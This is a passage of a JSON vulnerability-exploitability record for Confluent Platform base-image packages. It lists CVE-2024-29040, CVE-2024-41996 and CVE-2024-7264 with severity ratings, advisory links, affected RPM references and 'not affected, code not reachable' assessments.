          "url": "https://github.com/tpm2-software/tpm2-tss/commit/710cd0b6adf3a063f34a8e92da46df7a107d9a99"
        },
        {
          "url": "https://github.com/tpm2-software/tpm2-tss/releases/tag/4.1.0"
        },
        {
          "url": "https://github.com/tpm2-software/tpm2-tss/security/advisories/GHSA-837m-jw3m-h9p6"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EFR7SVEWCOXORHPCLLGXEMHFMIGG2MFE/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GI4JFEZBKQQUPJ4RWK6IHEWXAFCEJDPI/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29040"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6796-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-29040"
        }
      ],
      "published": "2024-06-28T21:15:02+00:00",
      "updated": "2026-06-17T07:22:18+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.2.3-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-41996",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        295
      ],
      "description": "Validating the order of the public keys in the Diffie-Hellman Key Agreement Protocol, when an approved safe prime is used, allows remote attackers (from the client side) to trigger unnecessarily expensive server-side DHE modular-exponentiation calculations. The client may cause asymmetric resource consumption. The basic attack scenario is that the client must claim that it can only communicate with DHE, and the server must be configured to allow DHE and validate the order of the public key.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-41996"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-41996"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-089022.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-485750.html"
        },
        {
          "url": "https://dheatattack.gitlab.io/details/"
        },
        {
          "url": "https://dheatattack.gitlab.io/faq/"
        },
        {
          "url": "https://gist.github.com/c0r0n3r/abccc14d4d96c0442f3a77fa5ca255d1"
        },
        {
          "url": "https://github.com/openssl/openssl/issues/17374"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41996"
        },
        {
          "url": "https://openssl-library.org/post/2022-10-21-tls-groups-configuration/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-41996"
        }
      ],
      "published": "2024-08-26T06:15:04+00:00",
      "updated": "2026-06-17T07:48:36+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-5.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-5.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-7264",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "libcurl's ASN1 parser code has the `GTime2str()` function, used for parsing an\nASN.1 Generalized Time field. If given an syntactically incorrect field, the\nparser might end up using -1 for the length of the *time fraction*, leading to\na `strlen()` getting performed on a pointer to a heap buffer area that is not\n(purposely) null terminated.\n\nThis flaw most likely leads to a crash, but can also lead to heap contents\ngetting returned to the application when\n[CURLINFO_CERTINFO](https://curl.se/libcurl/c/CURLINFO_CERTINFO.html) is used.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-7264"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/07/31/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:1671"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:1673"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-7264"
        },
        {
          "url": "https://bugzilla.redhat.com/2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/2339305"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339305"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-7264.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-7264.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11053"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21193"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21194"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21196"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21197"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21198"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21201"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21203"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21212"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21213"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21218"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21219"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21230"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21231"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21236"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21237"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21238"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21239"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21241"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21247"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37371"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5535"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7264"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21490"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21491"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21494"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21497"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21500"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21501"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21503"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21504"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21505"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21518"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21520"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21521"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21522"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21523"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21525"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21529"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21531"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21534"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21536"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21540"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21543"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21546"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21555"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21559"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-1671.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:1673"
        },
        {
          "url": "https://github.com/curl/curl/commit/27959ecce75cdb2809c0bdb3286e60e08fadb519"
        },
        {
          "url": "https://hackerone.com/reports/2629968"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-7264.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-1673.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7264"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240828-0008/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241025-0006/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241025-0010/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6944-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6944-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-7264"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL"
        }
      ],
      "published": "2024-07-31T08:15:02+00:00",
      "updated": "2026-06-17T08:19:43+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
